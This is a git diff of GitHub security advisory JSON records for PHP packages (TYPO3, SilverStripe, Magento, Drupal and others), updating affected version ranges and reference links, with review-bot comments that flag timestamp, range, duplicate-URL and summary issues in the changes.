diff --git a/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json b/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json index cf4d2a977f8f2..b9052935a1b7c 100644 --- a/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json +++ b/advisories/github-reviewed/2018/09/GHSA-pj7m-g53m-7638/GHSA-pj7m-g53m-7638.json @@ -33,6 +33,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.4" + } + ] + } + ] } ], "references": [ @@ -60,6 +136,14 @@ "type": "WEB", "url": "https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2018-14041.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2018-14041.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/twbs/bootstrap" @@ -88,6 +172,10 @@ "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/18" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-006" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" 
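Review bot: The file's `modified` timestamp is not bumped even though the `affected` list changes — this file's first hunk is at line 33, so the line-4 `"modified"` value is left untouched, while GHSA-cg8j-8w52-735v and GHSA-xm6j-x342-gwq9 in the same commit do update it. OSV consumers and mirrors generally sync on `modified`, so a range change without a bump can go unnoticed downstream. The same applies to GHSA-g68x-vvqq-pvw3, GHSA-v3f6-f29f-rgvp, GHSA-6r58-4xgr-gm6m, GHSA-89ch-hqf9-rgp3, GHSA-jvx5-rm6q-gx7p, GHSA-pqm6-cgwr-x6pf, GHSA-w7r7-r8r9-vrg2 and GHSA-x8wj-6m73-gfqp, whose affected ranges change with no hunk touching line 4. If the export pipeline rewrites `modified` on its own this is expected; otherwise each of these files needs `"modified": "<EXPORT-TIMESTAMP>",` (placeholder) alongside the range edit.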
diff --git a/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json b/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json index ad037582cab60..7e9e3a8168926 100644 --- a/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json +++ b/advisories/github-reviewed/2018/11/GHSA-g68x-vvqq-pvw3/GHSA-g68x-vvqq-pvw3.json @@ -33,6 +33,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.21" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.21" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.2" + } + ] + } + ] } ], "references": [ @@ -48,10 +124,22 @@ "type": "WEB", "url": "https://ckeditor.com/cke4/release/CKEditor-4.11.0" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2018-17960.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2018-17960.yaml" + }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-g68x-vvqq-pvw3" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2018-005" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030123/http://www.securityfocus.com/bid/109205" 
diff --git a/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json b/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json
index 5b6a1381bf5aa..60b76696e7d17 100644
--- a/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json
+++ b/advisories/github-reviewed/2019/09/GHSA-3v43-877x-qgmq/GHSA-3v43-877x-qgmq.json
@@ -48,6 +48,10 @@
 "type": "WEB",
 "url": "https://github.com/thephpleague/commonmark/issues/353"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/league/commonmark/CVE-2019-10010.yaml"
+ },
 {
 "type": "ADVISORY",
 "url": "https://github.com/advisories/GHSA-3v43-877x-qgmq"
diff --git a/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json b/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json
index 7e6653c5f0e44..28fff3ddb9666 100644
--- a/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json
+++ b/advisories/github-reviewed/2019/10/GHSA-v3f6-f29f-rgvp/GHSA-v3f6-f29f-rgvp.json
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "drupal/drupal"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.0"
+ },
+ {
+ "fixed": "8.3.7"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -40,6 +59,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6923"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2017-6923.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2017-6923.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.drupal.org/SA-CORE-2017-004"
+ },
 {
 "type": "WEB",
 "url": "https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2017-08-16/drupal-core-multiple"
diff --git a/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json b/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json index 02f7c741fc848..891fd3eafb9e8 100644 --- a/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json +++ b/advisories/github-reviewed/2019/11/GHSA-6r58-4xgr-gm6m/GHSA-6r58-4xgr-gm6m.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.0.0" + "introduced": "4.4.0" }, { - "fixed": "4.3.6" + "fixed": "4.4.4" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.4.0" + "introduced": "4.3.0" }, { - "fixed": "4.4.4" + "fixed": "4.3.5" } ] } @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12617.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/blog/tag/release" @@ -74,6 +78,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12617" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12617/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json b/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json index 754dce1ac7a6e..1d7f1230d257a 100644 --- a/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json +++ b/advisories/github-reviewed/2019/11/GHSA-89ch-hqf9-rgp3/GHSA-89ch-hqf9-rgp3.json 
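Review bot: The two rewritten ranges in the `@@ -25` and `@@ -44` hunks narrow the affected set: before, the entries covered 4.0.0 ≤ v < 4.3.6 and 4.4.0 ≤ v < 4.4.4; after, they cover 4.4.0 ≤ v < 4.4.4 and 4.3.0 ≤ v < 4.3.5, so 4.0.x–4.2.x silently stop being flagged and the fix version moves from 4.3.6 to 4.3.5. Both should be confirmed against the silverstripe security-release page already in the references, since a wrongly raised lower bound suppresses alerts for dependents still on 4.0–4.2; the package names for these entries sit outside the hunk. The same `"introduced": "0"` → explicit-lower-bound rewrite appears in GHSA-cg8j-8w52-735v (both `[0, 4.3.6)` entries removed, the remaining framework range becomes 4.1.0 ≤ v < 4.3.5, and silverstripe/cms is left with a single entry whose range is outside the hunk), GHSA-w7r7-r8r9-vrg2 (drops < 3.6.0, 4.3.6 → 4.3.5), GHSA-qvrv-2x7x-78x2 (drops < 4.0.0), and GHSA-pqm6-cgwr-x6pf, GHSA-8vp7-j5cj-vvm2 and GHSA-x8wj-6m73-gfqp (0 → 1.0.0, harmless only if no pre-1.0 release exists on Packagist).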
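Review bot: The added reference `https://www.silverstripe.org/download/security-releases/cve-2019-12617/` in the `@@ -74` hunk duplicates the entry directly above it, differing only in case and a trailing slash, so the advisory now lists the same page twice. Unless the two URLs are known to resolve to different content, keep one form and drop the other. The same near-duplicate pair is added in GHSA-cg8j-8w52-735v, GHSA-jvx5-rm6q-gx7p, GHSA-w7r7-r8r9-vrg2, GHSA-xm6j-x342-gwq9 and GHSA-qvrv-2x7x-78x2; GHSA-79gr-58r3-pwm3 and GHSA-w2fr-65vp-mxw3 add Fedora list URLs with `%40` beside the existing `@` form, and GHSA-w2fr-65vp-mxw3 adds `typo3-core-sa-2019-016` beside the existing `typo3-core-sa-2019-016/`.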
@@ -49,6 +49,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "magento/product-community-edition" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.2" + }, + { + "fixed": "2.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "magento/product-community-edition" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3" + }, + { + "fixed": "2.3.2-p2" + } + ] + } + ] } ], "references": [ diff --git a/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json b/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json index 3e09915a409ad..94c42957f4775 100644 --- a/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json +++ b/advisories/github-reviewed/2019/11/GHSA-cg8j-8w52-735v/GHSA-cg8j-8w52-735v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cg8j-8w52-735v", - "modified": "2021-12-03T14:39:16Z", + "modified": "2024-02-05T10:39:45Z", "published": "2019-11-12T23:01:25Z", "aliases": [ "CVE-2019-12204" @@ -18,26 +18,7 @@ { "package": { "ecosystem": "Packagist", - "name": "silverstripe/framework" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "4.3.6" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "silverstripe/framework" + "name": "silverstripe/cms" }, "ranges": [ { @@ -56,36 +37,17 @@ { "package": { "ecosystem": "Packagist", - "name": "silverstripe/cms" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "4.3.6" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "silverstripe/cms" + "name": "silverstripe/framework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "4.4.0" + "introduced": "4.1.0" }, { - "fixed": "4.4.4" + "fixed": "4.3.5" } ] } 
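Review bot: The new upper bound `"fixed": "2.3.2-p2"` depends on Composer's ordering, where a `-p<N>` suffix is a post-release that sorts above `2.3.2`; a consumer that compares Packagist ranges with generic semver rules treats `-p2` as a pre-release below `2.3.2` and would report plain 2.3.2 as fixed. Worth checking that the matcher used for ECOSYSTEM ranges on Packagist follows Composer semantics; if it does not, 2.3.2 needs to be covered explicitly rather than by the suffix. GHSA-xv69-f7x5-r4qw in this commit has the same shape with `"fixed": "2.3.2-p1"`.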
@@ -101,6 +63,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12204.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/silverstripe/cms" @@ -116,6 +82,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12204" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12204/" } ], "database_specific": { @@ -125,6 +95,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2019-10-01T18:05:09Z", - "nvd_published_at": null + "nvd_published_at": "2019-09-25T19:15:10Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json b/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json index 334dccaccaf90..a2a7aaa9a7527 100644 --- a/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json +++ b/advisories/github-reviewed/2019/11/GHSA-jvx5-rm6q-gx7p/GHSA-jvx5-rm6q-gx7p.json @@ -90,6 +90,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/assets" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.3.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/assets" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.4" + } + ] + } + ] } ], "references": [ @@ -101,6 +139,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/assets/CVE-2019-12245.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/" 
@@ -108,6 +150,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12245" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12245/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json b/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json index 0d2f7df2d63de..5487577299ce6 100644 --- a/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json +++ b/advisories/github-reviewed/2019/11/GHSA-pqm6-cgwr-x6pf/GHSA-pqm6-cgwr-x6pf.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { - "fixed": "2.1.1" + "fixed": "3.0.4" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "1.0.0" }, { - "fixed": "3.0.4" + "fixed": "2.1.1" } ] } @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://github.com/robrichards/xmlseclibs/commit/0a53d3c3aa87564910cae4ed01416441d3ae0db5" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/robrichards/xmlseclibs/CVE-2019-3465.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00003.html" diff --git a/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json b/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json index 911ab922bf494..506a00252020a 100644 --- a/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json +++ b/advisories/github-reviewed/2019/11/GHSA-vvwv-h69m-wg6f/GHSA-vvwv-h69m-wg6f.json 
@@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/0e6238c69e863b58aeece61e48ea032696c6dccd" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2019-12331.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/PHPOffice/PhpSpreadsheet" diff --git a/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json b/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json index 2e9f39518a863..7bc9bccd7b564 100644 --- a/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json +++ b/advisories/github-reviewed/2019/11/GHSA-w7r7-r8r9-vrg2/GHSA-w7r7-r8r9-vrg2.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.7.0" }, { - "fixed": "3.6.8" + "fixed": "3.7.4" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.7.0" + "introduced": "4.4.0" }, { - "fixed": "3.7.4" + "fixed": "4.4.4" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.0.0" + "introduced": "3.6.0" }, { - "fixed": "4.3.6" + "fixed": "3.6.8" } ] } @@ -82,10 +82,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.4.0" + "introduced": "4.0.0" }, { - "fixed": "4.4.4" + "fixed": "4.3.5" } ] } @@ -101,6 +101,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12203.yaml" + }, { "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-framework/blob/4/docs/en/04_Changelogs/4.4.4.md#444" @@ -112,6 +116,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12203" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12203/" } ], "database_specific": { 
diff --git a/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json b/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json
index 2748670a28d9a..7bb15386a11df 100644
--- a/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json
+++ b/advisories/github-reviewed/2019/11/GHSA-xcrg-29h7-h4cj/GHSA-xcrg-29h7-h4cj.json
@@ -56,6 +56,10 @@
 "type": "WEB",
 "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/0f8f071e24ee8b114d894ac172f77dc250e5bfa4"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2018-19277.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/PHPOffice/PhpSpreadsheet"
diff --git a/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json b/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json
index 4f4044619ce1f..f8fe3b7bf3ab2 100644
--- a/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json
+++ b/advisories/github-reviewed/2019/11/GHSA-xm6j-x342-gwq9/GHSA-xm6j-x342-gwq9.json
@@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-xm6j-x342-gwq9", - "modified": "2021-07-27T22:02:46Z", + "modified": "2024-02-07T18:26:10Z", "published": "2019-11-12T23:01:05Z", "aliases": [ "CVE-2019-16409" ], - "summary": "Unpublished files are exposed publicly", + "summary": "SilverStripe Versioned Files module Unpublished files are exposed publicly", "details": "In the Versioned Files module through 2.0.3 for SilverStripe 3.x, unpublished versions of files are publicly exposed to anyone who can guess their URL. This guess could be highly informed by a basic understanding of the symbiote/silverstripe-versionedfiles source code. (Users who upgrade from SilverStripe 3.x to 4.x and had Versioned Files installed have no further need for this module, because the 4.x release has built-in versioning. However, nothing in the upgrade process automates the destruction of these insecure artefacts, nor alerts the user to the criticality of destruction.)", "severity": [ { @@ -33,6 +33,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.3.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.4" + } + ] + } + ] } ], "references": [ @@ -40,6 +78,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16409" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-16409.yaml" + }, { "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-framework" 
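Review bot: The new summary `"SilverStripe Versioned Files module Unpublished files are exposed publicly"` runs two fragments together with a stray capital in the middle; a single clause reads better, e.g. `"summary": "SilverStripe Versioned Files module exposes unpublished files publicly",`. Not a blocker, but the summary is the line most consumers display.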
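Review bot: The added entries in the `@@ -33` hunk mark silverstripe/framework 4.0.0 ≤ v < 4.3.5 and 4.4.0 ≤ v < 4.4.4 as affected, but the unchanged `details` in the first hunk say the issue is in the Versioned Files module for SilverStripe 3.x and that the 4.x release has built-in versioning with no further need for the module — so the framework 4.x ranges appear to contradict the advisory's own description. If the `silverstripe/framework/CVE-2019-16409.yaml` reference added in the `@@ -40` hunk is the source, confirm it describes this same issue rather than a 4.x fix shipped in the same release batch (4.3.5/4.4.4 is the pair used by the other SilverStripe advisories in this commit). Otherwise either drop the two framework entries or extend `details` to say what in 4.x is affected.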
@@ -51,6 +93,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/cve-2019-16409" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-16409/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json b/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json index ae94feee37577..3af420c2498fd 100644 --- a/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json +++ b/advisories/github-reviewed/2019/11/GHSA-xv69-f7x5-r4qw/GHSA-xv69-f7x5-r4qw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xv69-f7x5-r4qw", - "modified": "2023-09-06T13:45:11Z", + "modified": "2024-02-02T18:12:48Z", "published": "2019-11-12T22:59:43Z", "aliases": [ "CVE-2019-8145" @@ -47,7 +47,7 @@ "introduced": "2.3" }, { - "fixed": "2.3.3" + "fixed": "2.3.2-p1" } ] } @@ -79,6 +79,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2019-11-12T22:12:58Z", - "nvd_published_at": null + "nvd_published_at": "2019-11-06T01:15:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json b/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json index 18d25ba2fb415..6de001300e14d 100644 --- a/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json +++ b/advisories/github-reviewed/2019/12/GHSA-6rmq-x2hv-vxpp/GHSA-6rmq-x2hv-vxpp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6rmq-x2hv-vxpp", - "modified": "2023-09-08T14:19:06Z", + "modified": "2024-02-05T15:41:44Z", "published": "2019-12-02T18:11:25Z", "aliases": [ "CVE-2019-6338" @@ -106,6 +106,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2019-12-02T00:34:49Z", - "nvd_published_at": null + "nvd_published_at": "2019-01-22T14:29:00Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json b/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json
index c972de63a14e7..6bc78953566bd 100644
--- a/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json
+++ b/advisories/github-reviewed/2019/12/GHSA-79gr-58r3-pwm3/GHSA-79gr-58r3-pwm3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-79gr-58r3-pwm3",
- "modified": "2023-09-21T19:46:51Z",
+ "modified": "2024-02-01T15:48:28Z",
 "published": "2019-12-02T18:07:16Z",
 "aliases": [
 "CVE-2019-18889"
@@ -147,6 +147,10 @@
 "type": "WEB",
 "url": "https://github.com/symfony/symfony/releases/tag/v4.3.8"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UED22BOXTL2SSFMGYKA64ZFHGLLJG3EA/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UED22BOXTL2SSFMGYKA64ZFHGLLJG3EA/"
@@ -171,6 +175,6 @@
 "severity": "CRITICAL",
 "github_reviewed": true,
 "github_reviewed_at": "2019-12-01T19:45:07Z",
- "nvd_published_at": null
+ "nvd_published_at": "2019-11-21T23:15:13Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json b/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json
index a0c3c39605a98..24dd7077e8c10 100644
--- a/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json
+++ b/advisories/github-reviewed/2019/12/GHSA-wjx8-cgrm-hh8p/GHSA-wjx8-cgrm-hh8p.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wjx8-cgrm-hh8p",
- "modified": "2023-04-25T16:32:33Z",
+ "modified": "2024-02-05T10:52:24Z",
 "published": "2019-12-17T22:53:10Z",
 "aliases": [
 "CVE-2019-19745"
